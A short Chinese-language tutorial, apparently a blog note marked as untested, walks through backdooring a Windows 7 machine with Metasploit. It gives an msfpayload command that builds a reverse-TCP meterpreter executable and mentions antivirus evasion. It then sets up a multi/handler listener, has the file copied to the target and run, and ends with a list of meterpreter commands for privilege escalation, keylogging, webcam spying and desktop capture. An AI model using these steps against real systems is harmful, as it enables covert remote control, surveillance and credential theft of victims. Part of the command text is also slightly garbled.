沒有測試---先行記錄
很多朋友對使用Metasploit利用後門程式進行滲透windows7都比較感興趣,針對這些以下業内相關專家就給大家介紹下,當下黑客怎麼利用Metasploit進行滲透windows7的。
設定目标主機為:cn_win7_x86_7601虛拟機,位址為:192.168.0.116;而本地主機就為:192.168.0.149。
方法步驟一:黑客用Msfpayload直接生成相關的後門程式,如下圖。
sfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.149 x >steup.exe
方法步驟二:黑客直接就能進入所在的目錄并将屬性進行修改,換為允許以程式執行檔案,詳細如下圖。
進入所在目錄,修改屬性:選擇“允許以程式執行檔案”,這時候也可以做一些免殺
方法步驟三:接着黑客就打開msfconsole并加載exploit/multi/handler子產品并進行設定本地主機,最後就能開始進行監聽了,詳細情況如下圖。
打開msfconsole,加載exploit/multi/handler子產品,設定本地主機;然後開始監聽:exploit -z -j :
方法步驟四:黑客需要能将程式直接拷貝都目标主機中并進行執行。
方法步驟五:以上步驟全部完成後黑客就能通過後門程式反向連接配接到msf,用msf就能發起第2次的攻擊然後使用用戶端也就是後門程式就能連接配接都服務端msf,詳細的如下圖。
Meterpreter就是metasploit架構中的一個擴充子產品,是以的話溢出成功後黑客就能攻擊載荷進行使用,一旦攻擊載荷在溢出攻擊成功後就能再傳回一個控制通道,這樣就能将它作為攻擊載荷成功獲得目标系統的一個meterpretershell的連結。
另外,附meterpreter常用指令:
getsystem #會自動利用各種各樣的系統漏洞來進行權限提升
migrate #程序id程序遷移
background #把目前的會話設定為背景,需要的時候在啟用
getuid #檢視對方正在運作的使用者
ps #列出所有的程序
getpid #傳回運作meterpreter的id号
sysinfo #産看系統資訊和體系結構
shell #切換到cmd的系統權限方式
exit #退出shell會話傳回meterpreter或終止meterpreter
getdesktop 截取目标主機目前桌面會話視窗
run webcam -p /var/www #在/var/www目錄監控目标主機的攝像頭
keylog_recorder #使用migrate将會話遷移至explorer.exe的程序空間後記錄鍵盤